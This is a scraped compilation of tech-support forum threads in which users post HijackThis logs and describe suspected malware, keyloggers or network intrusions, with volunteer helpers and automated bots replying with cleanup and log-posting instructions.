There is a chance that you are infected with a backdoor, bot or RAT. (remote administration tool). If this is the case more powerful advanced tools will be needed than can be used here in Am I Infected.Please follow the instructions in ==>This Guide<== starting at Step 6. If you cannot complete a step, skip it and continue.Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<== Please include a description of your computer issues, what you have done to resolve them, and a link to this topic.If you can produce at least some of the logs, then please create the new topic and explain what happens when you try to create the log(s) that you couldn't get. If you cannot produce any of the logs, then still post the topic and explain that you followed the Prep. Guide, were unable to create the logs, and describe what happens when you try to create the logs.It would be helpful if you post a note here once you have completed the steps in the guide and have started your topic in malware removal. Good luck and be patient.If HelpBot replies to your topic, PLEASE follow Step One so it will report your topic to the team members.

3 more replies
Relevance 48.38%

A friend is fearful that her computer has been compromised. This is the HJT logfile:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:29:07 PM, on 11/1/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16915)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\Program Files\AVG\AVG8\avgcsrvx.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Windows Live\Contacts\wlcomm.exe
C:\PROGRA~1\AVG\AVG8\avgnsx.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.comcast.net
R3 - URLSearchHook: AVG Security Toolbar BHO - {A3BC75A2-1F87-4686-AA43-5347D756017C} - C:\Program Files\AVG\AVG8\Toolbar\IEToolbar.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D... Read more

Answer:Suspect computer is compromised!

Hello and Welcome to TSF.

We no longer use HijackThis as our initial analysis tool.

We want all our members to perform the steps outlined in the link I'll give you below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

---------------------------------------------------------------------------------------------

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.


More detail about why your friend thinks the machine has been compromised will be helpful. What symptoms? Please report them in your new topic.

1 more replies
Relevance 48.38%

I have a 2wire router/modem which is usually very sloppy but today I noticed a few warning signs that make me think that somebody accessed or tried to access to my computer through my network.

First, last night I completely charged my Acer laptop and used it for a few minutes. When I woke up, I could hear the computer was trying to start unsuccessfuly but I didn't worry about that since it does that sometimes, I have a cheap laptop. I woke up my computer (I don't shut it down everyday) and I could go online right away, but after 5 minutes I was disconnected. I reset my router once but after a few minutes my internet was disconnected again. This time, I manually disconnected my computer from my network and reset the router again. When I came back to my computer, this is what happened:

* My computer was connected to a neighbor's unsecured network.
* Right away, I disconnected from that network and connected to my own secure, hidden network.
* ZoneAlarm prompted me to add and set the new network. Since I didn't know which network that was, I did something stupid. I shut down ZoneAlarm. When I realized that, I started it again.
* I went to my devices and I found a Belkin router--I have a 2wire router. I deleted it.
* I went to ZoneAlarm and found my own network and another network that shouldn't have been there. I deleted all networks.

I don't remember my last configuration but I think it might have changed. This is what I see in Network and Shari... Read more

Answer:Help me figure out if my computer has been compromised

Enable WPA(2)-PSK encryption on the router. Use a strong passphrase--20+ (at least 8 or 9) characters of letters and numbers and special characters mixed (do not use dictionary words).
 

3 more replies
Relevance 48.38%

Hi,
 
I have an ongoing problem. For the last five years, the same person or persons keeps breaking into my computer, and network. I have had several computers, different ISP's, I have even moved out of state for six months even there they kept on attacking me, I came back and still the person keeps getting in. I have bought security software, and I have used the free ones as well, and to no avail. Somehow this person is able to listen into my conversations. Now they are impersonating me online, and make it their business to draw my attention to it. One thing is if they are harassing me, and threatening to hurt me. But is completely another when they are taking to harassing my family, or anyone else that I care about. I have contacted the police they wont do anything without solid proof. I have sent in complaints to FBI, and other computer crime resources, heard nothing back from them.
 
This person believes that since they have been getting away with this so long, no one can stop them. I must stop them. I need to get my life back. This person or persons are all into my business, and I do not even know their name? They can attack me whenever they want to,and I cannot identify this person? I need help here. I feel like a victim, I sound like one even to my own ears. I do not wish to be one. I won't be one. Can you help me with my problem? If you could I would most certainly thank you.

Answer:Computer and cellphone compromised

Tonight I downloaded the tcp utility to see what is going on on network. Everytime I try to run the program it starts to run then it shuts down. I have tried several times, and still the same result. What I did notice for the short time that the program was running that there many processes running. I noticed other things as well. I just tried again, and many of the process running before are all closed down. I see now that there are just very few running, not the case five minutes ago.
 
Also I was having issues accesing a site I use usually with no issues. I believe that it was a denial of service attack. This went on for about three hours.
 
I was hoping that by now someone would get around to helping me with this problem. I am aware that there many people are on this site, and they too need help. I am going to continue to ask for help, and state what is going on until I am helped. I would prefer to receive help from someone who actually works for the site. I am not being fussy or think that I am more entitled than anyone else. The person who has been attacking me has just recently tried to communicate with me. I must be sure who I am speaking to, and who is assisting me with his situation.Thank you.

3 more replies
Relevance 48.38%

Help.... Please...

I think that I have a few problems going on that are a result of an infestation of a virus or other malicious software. I am running an IIS on a Windows 2000 Server. Since last week we cannot send email. I even tried to drop a few messages into the pickup directory and it immediately goes to the bad mail folder. So far, I have found the following.

1. net32a.exe

2. spybot.exe

Also, when trying to send mail I receive a message that looks like the following:

"Unable to deliver this message because the follow error was encountered: "Error is processing file in pickup directory.". The specific error code was 0xC00402CE.
The wording is broken in some places ("follow" instead of following / Error "is" instead of Error "in") which leads me to believe I may have been compromised by someone. I'm not sure what to do... I need help.
Thank you.
 

Answer:Solved: Computer Compromised? Help...

16 more replies
Relevance 48.38%

This is going to be a long one, sorry. Let me start by saying that I am a professional in the field (web systems engineer) so have a pretty good working knowledge of systems and networks.
 
I recently (6/28/16) received an email from my ISP (Cox) stating that they detected a ZBot infection from my network, due to access of a known C&C server. I inspected the email headers to ensure that the email did in fact come from Cox and it appears to be legitimate.
 
I can post the URL that they said my network had contacted, but was not sure if I should do that in this forum or not, given the stated rules. Since my systems are behind a router locally Cox was (obviously) not able to tell which system on my side this traffic came from, but I only have one personal Windows system running at the moment. There are also a few Android devices, a smart TV, and Xbox One.
 
We use OpenDNS (free version) for our DNS services here, and the OpenDNS server IPs are configured directly on the router. All devices within the network use DHCP and pull the correct IPs for DNS services from the router as expected (FYI -- router is a DLink DIR-655 on the latest firmware). I have confirmed that all of this still appears to be in place and that OpenDNS is recording queries coming through it. I also confirmed that the specific URL that Cox flagged was indeed seen in the OpenDNS logs on 6/28/16. This part seemed a little strange to me -- that Cox was able to determine that this URL was access... Read more

Answer:Compromised Computer Notification from ISP

Here is the same netstat command output following a fresh startup (taken about 5-10 minutes after startup to allow initial communications to settle down).
 
TCP Statistics for IPv4
  Active Opens                        = 381
  Passive Opens                       = 77
  Failed Connection Attempts          = 8
  Reset Connections                   = 101
  Current Connections                 = 8
  Segments Received                   = 22743
  Segments Sent                       = 16818
  Segments Retransmitted              = 475
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    127.0.0.1:49668... Read more

4 more replies
Relevance 48.38%

Seems my computer, as well as a few other computers of people at an office I do work at, have been compromised. There has been access to my Gmail account from China (according to a message to me from Gmail) in the past few days, my Warcraft account has been hacked, and two other people I know at this office have had their Hotmail accounts accessed and used to spam people in their contacts in the last two days.I did a full scan of all of my computers with Kaspersky Internet Security 2010 (which is always running on them anyway and automatically updates daily) and came up with nothing.If one of you fine fellows could have a look at my other logs and see if you see anything suspicious, I would much appreciate it. SAS found 6 tracking cookies. I was familiar with where all came from.Code: [Select]SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 04/24/2010 at 10:40 AM

Application Version : 4.35.1002

Core Rules Database Version : 4846
Trace Rules Database Version: 2658

Scan type       : Quick Scan
Total Scan Time : 01:47:07

Memory items scanned      : 634
Memory threats detected   : 0
Registry items scanned    : 525
Registry threats detected : 0
File items scanned        : 93216
File threats detected     : 6

Adware.Tracking Cookie
C:\Users\Noah\AppData\Roaming\M... Read more

Answer:Computer possibly compromised

Please download ComboFix from BleepingComputer.comAlternate link: GeeksToGo.comRename ComboFix.exe to combo-fix.exe before you save it to your DesktopDisable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools A guide to do this can be found hereClick Start then copy paste the following command into the search box & hit enter: "%userprofile%\desktop\combo-fix.exe" /stepdelAs part of it's process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. This will not install in Vista. Just continue scanning, and skip the console install.When finished, it shall produce a log for you.  Please include the contents of C:\ComboFix.txt in your next reply.

14 more replies
Relevance 48.38%

Logfile of HijackThis v1.99.1
Scan saved at 1:45:09 PM, on 4/03/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe
C:\WINDOWS\system32\RunDll32.exe
C:\WINDOWS\System32\sistray.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\system32\rundll32.exe
C:\PROGRA~1\INTERN~2\MEDIAKEY.EXE
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnf.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposol08.exe
C:\Program Files\DLink\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\PROGRA~1\INTERN~2\KBOSDCtl.EXE
C:\PROGRA~1\INTERN~2\KCodeMsg.EXE
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpoevm08.exe
C:\Program Files\Common File... Read more

Answer:Another Hijack This log from another compromised computer :(

13 more replies
Relevance 48.38%

My friend was browsing through the internet on firefox and inadvertently downloaded a malicious program by visiting a website link posted on a forum. I know that my computer is infected as I have had multiple passwords changed on me such as my email password and my friend's game account has also had a password change. I have scanned with AVG and spybot search and destroy. Nothing has worked thus far. I would try to do something with hijack this, but I made an error due to my stupidity last time I tried to delete something scanned by it and ended up having to re-format my system. Here is the log that I have from a recent scan. Any help is greatly appreciated.

Logfile of HijackThis v1.99.1
Scan saved at 6:36:45 PM, on 9/7/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16705)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\brsvc01a.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\brss01a.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\PROGRA~1\AVG\AVG8\avgfws8.exe
C:\WINDOWS\system32\Brmfrmps.exe
C:\WINDOWS\s... Read more

More replies
Relevance 48.38%

The first time I noticed this I got a window saying "This machine dangerously low on resources!" I read where Win98se users should correct this by rebooting and clearing the cache, that this is a flaw in 98. I did but the problem persists, especially if I have Word and a couple of other applications running at once.
Task monitor shows that Explorer is continuously running in the background, even tho I use Firefox for browsing. Attempts to close Explorer result in a scrambled desktop and that 'Restore Active Desktop' message, or everything simply hangs until I power off and reboot. I run 98se on a compaq deskpro with Pentium 3 that is part of a home network with 2 other computers running Windows XP. They seem to be fine.
Here is a Hijack This! log I just ran which is pretty short.

Logfile of HijackThis v1.99.1
Scan saved at 8:16:08 AM, on 6/11/06
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\MDM.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\CA\ETRUST EZ ARMOR\ETRUST EZ FIREWALL\CA.EXE
C:\PROGRAM FILES\ANALOG DEVICES\SOUNDMAX\SMTRAY.EXE
C:\WINDOWS\SYSTEM\ZONELABS\VSMON.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\PROGRAM FIL... Read more

More replies
Relevance 48.38%

My wow account has been recently hacked 2 times in a row by a keylogger. I was told that posting my HJT logfile as well as my MBAM logfile should be useful for someone specialized in 'malware detecting and cleaning' to see what is really happening in my PC and finally fix it. Please take a look at my logfiles below:

Here's the HijackThis logfile:


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:34:27 μμ, on 14/9/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Microsoft IntelliType Pro\itype.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\COMODO\COMODO Internet Security\cfp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\OSK.exe
C:\WINDOWS\system32\MSSWCHX.EXE
C:\Program Files\A... Read more

Answer:Computer compromised with keylogger.Please help!

Hello and Welcome to TSF.

We no longer use HijackThis as our initial analysis tool.

We want all our members to perform the steps outlined in the link I'll give you below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

---------------------------------------------------------------------------------------------

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

1 more replies
Relevance 48.38%

I was on my computer tonight when my computer froze and I had to restart. I'm on a wireless connection run by my apartment building, and I have some personal security stuff on here but really am not too sure about the wireless security my building runs. I don't really download that much off of the internet, so I was surprised when strange things happened when I restarted my computer tonight. First, there was a brand new internet connection listed under my connections tab called Internet (1) that was not there before using WAN miniport. Also, the bar on the bottom of my screen is becoming distorted at times for no reason. And as I just now look, part of my screen is becoming cut off, with a strip of nothing but black along the right hand side of the screen. The time was changed to military time which I didn't do, and I can't change it back for some reason. I'm going to post my HJT log, and I also have RKR, ComboFix, and GMER on my computer as well. If anyone can help me, I'd greatly appreciate it, thanks!

Here's the HJT log:

Logfile of HijackThis v1.99.1
Scan saved at 00:18, on 07-01-10
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\acs.exe
C... Read more

Answer:I think my computer security has been compromised?

If someone can please help me I would greatly appreciate it....thanks!
 

2 more replies
Relevance 48.38%

Hey guys,
 
I'm a little out of my depth here so don't feel bad about telling me I'm a complete idiot.  I got to work this morning unable to connect to my network drives because "The system detected a possible attempt to compromise security." So I did a little digging through event viewer and found a few disconcerting entries:
 
At 6:14 AM this morning: The Terminal Server security layer detected an error in the protocol stream and has disconnected the client. Client IP: 69.49.130.122.
 
According to google this generally happens when there's high traffic to the server, but the server doesn't get high traffic ever and the office doesn't even open until 7.
 
Also there's an audit at 12:45AM: 
 
A logon was attempted using explicit credentials.

Subject:
Security ID: SYSTEM
Account Name: WORKSTATION-17$
Account Domain: <REDACTED>
Logon ID: 0x3e7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: WORKSTATION-17$
Account Domain: <REDACTED>
Logon GUID: {b8e5e60f-7cd0-e25e-5654-baf839662d0d}
Target Server:
Target Server Name: workstation-17$
Additional Information: workstation-17$
Process Information:
Process ID: 0xce0
Process Name: C:\Windows\System32\taskhost.exe
Network Information:
Network Address: -
Port: -
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occu... Read more

Answer:My computer's security may have been compromised.

Open the Start Menu and type cmd in the Search programs and features box.  Command will appear above the search box in the, right click and select Run as administrator.  This will open the Command Prompt.
 
When the Command Prompt opens copy the command below and paste it in the command prompt, then press Enter.
 
netsh int tcp set global chimney=disabled

2 more replies
Relevance 47.97%

Hi, I just got an email from my ISP saying that my computer is infected.
 
Here is the actual quote from the email (only part of it, the rest of the email was just them recommending scanners to use)
 
"Dear Subscriber,ISP has identified that one or more computers/ devices behind your cable modem may be infected with the FakeSecSen or "Spy Sheriff" Virus. A device behind your cable modem appears to have connected to a command and control server affiliated with this malware."
 
I have 
 
- Windows 10 Home edition
- 64 bit
- Bitdefender Antivirus Plus 2018
 
My computer has been acting fine and I have not seen any strange pop-ups or anything like that yet.
 
Thanks for your help in advanced

Answer:ISP sent me a "Compromised Computer Notification" email

"Dear Subscriber" is the first indication its fake.....they would use your name when contacting you,
 
delete the email and ignore it, or call them directly.....don't follow any instructions on the email, or click on anything in the email

22 more replies
Relevance 47.97%

Hi everyone, this computer is running Windows 8 and outlook 2013, plus Smart Security by ESET 7.

The other day my hosting company shut down my email accounts, not sure which system did it, but my dad and sister were using our webmail and now email accounts starting sending thousands of emails. This is the only details that I have. This computer is approx 2 months old and runs great. Please help by reviewing the files and see if there is anything trojans, malaware, etc that could have done this. We are afraid to use the systems as passwords are now compromised.

GMER had problems loading. COuld not run some scans because System32 was running and ntuser.dat. FYI

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 2:05:29 PM, on 4/21/2014
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v10.0 (10.00.9200.16537)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Windows\SysWOW64\RunDll32.exe
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_12_0_0_77.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_12_0_0_77.exe
C:\Program Files (x86)\TeamViewer\Version... Read more

Answer:emails & passwords have been compromised - Computer 1

10 more replies
Relevance 47.97%

It's been month reading and searching around forums but I just can't get it done. It's totally another level for newbie like me.
My laptop Samsung, desktop Alienware both got corrupted. Factory image being modified, download anti virus program but get mod become useless. Do not have admin rights on my own computer. Window firewall policy got mod but have no idea how to get it fixed. Window defender can't be run due to its service is missing. I have TEMP/TMP folder which can't be remove in my profile. All the files and folder is being shared but I did turn off sharing setting. Can't be delete due to admin access. Shortcut, and thumbnail have invalid path. Group policy is being mod which I'm totally clueless how to get it done. Workstation is running which I'm on a home network. Background process like CTF loader and COM keep running even thou I keep end the process. Window installer keep running but no idea what is it for. Window update keep searching but can't be install. Sometimes it get freeze. Registry is being mod, have no knowledge about it so don't dare to delete some of it. Cmd can't be run. Lots of svchost running in the svc. Did so many correction once restart everything back to square 1. Guys please help. Cause the one who did this is just staying right above me. So I'm clueless how I get it fix.

Answer:Computer devices got compromised using the same router.

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/581281 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

2 more replies
Relevance 47.97%

Hello all,
About two weeks ago my computer got attacked by a nasty virus, and ever since it?s been running a lot slower. A few days ago I got a message from time Warner cable that they were temporarily blocking my internet service because my computer had been turned into a zombie and was sending out spam messages. They weren?t completely sure, but they think it was the Koobface virus and the only way to get rid of it is to reformat and reinstall. Thankfully I have nearly everything I need backed up, some on CDs and most through Carbonite. I was also planning to upgrade to windows 7 so this is as good a time as any. The big issue I?m facing though is what can I safely put back on my system after I reinstall. From what I understand, when a computer is turned into a zombie the worm digs into your system and constantly changes its name so it?s nearly impossible to track down and get rid of. Is this only through things like the registry and system files/settings, or can it embed itself into other unrelated files like pictures and videos? If it?s the first situation I should be alright if I just restore everything in my Carbonite and hard copy backups back onto my clean system. But if it can get into my other files then are they all to tainted to trust? On a side note, could a worm infect files in a separate volume on my hard drive? Most of my movies are on their own partition so it would be simple to save them.

More replies
Relevance 47.97%

Hi Guys,
 
I been a frequent lurker on this site and you guys have been a great help. 
 
What are some options for someone who has had their phone's sim card cloned. Also the PC is compromised..
 
Have any of you ever dealt with a situation like this, what can I do to ensure that this phone is clean its an iphone 6 - the cell company says its been addressed. 
 
Will scanners like malwarebytes actually pick up installed "spy" programs? I believe someone locally did this.
 
I haven't looked at the computer yet, but just trying to get a game plan and not make any mistakes.

Answer:Computer compromised by a local person, help

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/578101 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

2 more replies
Relevance 47.97%

Here is the Log from the Panda scan. Computer is compromised. Severl problems.

I have Windows XP, Home Edition. Just checked for WINDOWS updates. Evidently all are there except for SP2.

LOG:


Incident Status Location

Virus:Trj/Cimuz.JX Disinfected Operating system
Adware:adware/virtualbouncer Not disinfected c:\windows\system32\INNERADINSTALL.LOG
Adware:adware/savenow Not disinfected c:\windows\downloaded program files\WUInst.inf ... Read more

Answer:Computer compromised. Many problems. Log attached.

Well it doesn't look bad after having run that program.

I just think you should run a couple of others.

Those are the two free programs from AVG, Antivirus and Antispyware. Be sure to also have removed the Panda program, and you can also remove both AVG programs after you have completed 2 cleanings each. As in clean, restart, clean once more.

http://free.grisoft.com/

2 more replies
Relevance 47.97%

Alright, my Dad's office has about 10 computers and they have all been locked down via securities to not have internet access; however one computer is open that receives the company email.

The other day some x-popups were on the screen when only one person was supposed to be in the office. This person denied it so any investigation was under way. A log was pulled of the last couple of months showing sites visited and the times they were visited. Some of the times were like 3 or 4 am. So logs where checked at the bldg security company to see when people were logged into the bldg, which no one was at the times involved. The computer has been slow for a very long time so my dad had already ordered another one before this happened so just replaced the computer in question.

So now we have a brand new computer added to the same network where it is the only computer online and it still shows visits to x-sites at 3 and 4 in the morning.

Can anyone explain what might be going on?

Thanks,
Will

Answer:Can my network be compromised if I just bought a new computer?

I am suspecting of a night crew some how..Cleaning,,night shift.Are thet on a router?What is the Antivirus?Lets run 2 sans on the PC that connectd..Please download TDSSKiller.zip and and extract it.Run TDSSKiller.exe. Click Start scan.When it is finished the utility outputs a list of detected objects with description.
The utility automatically selects an action (Cure or Delete) for malicious objects.
The utility prompts the user to select an action to apply to suspicious objects (Skip, by default). Let the options as it is and click ContinueLet reboot if needed and tell me if the tool needed a reboot.Click on Report and post the contents of the text file that will open.

Note: By default, the utility outputs the log into system disk (it is usually the disk with installed operating system, C:\) root folder. The Log has a name like: TDSSKiller.Version_Date_Time_log.txt.I'd like us to scan your machine with ESET OnlineScanHold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScanClick the button.For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)Click on to download the ESET Smart Installer. Save it to your desktop.Double click on the icon on your desktop.Check Click the button.Accept any security warnings from your browser.Under scan settings, check and check Remove found threats Click Advanced settings and select the following:Scan potentially unwanted applicationsScan for potential... Read more

1 more replies
Relevance 47.97%

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:03:14 PM, on 1/12/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\Creative Labs Shared\Service\CreativeLicensing.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\WINDOWS\System32\GEARSec.exe
C:\Program Files\Linksys\Linksys Updater\bin\LinksysUpdater.exe
C:\Program Files\Dell\QuickSet\NICCONFIGSVC.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\system32\java.exe
C:\WINDOWS\system32\svchost.exe
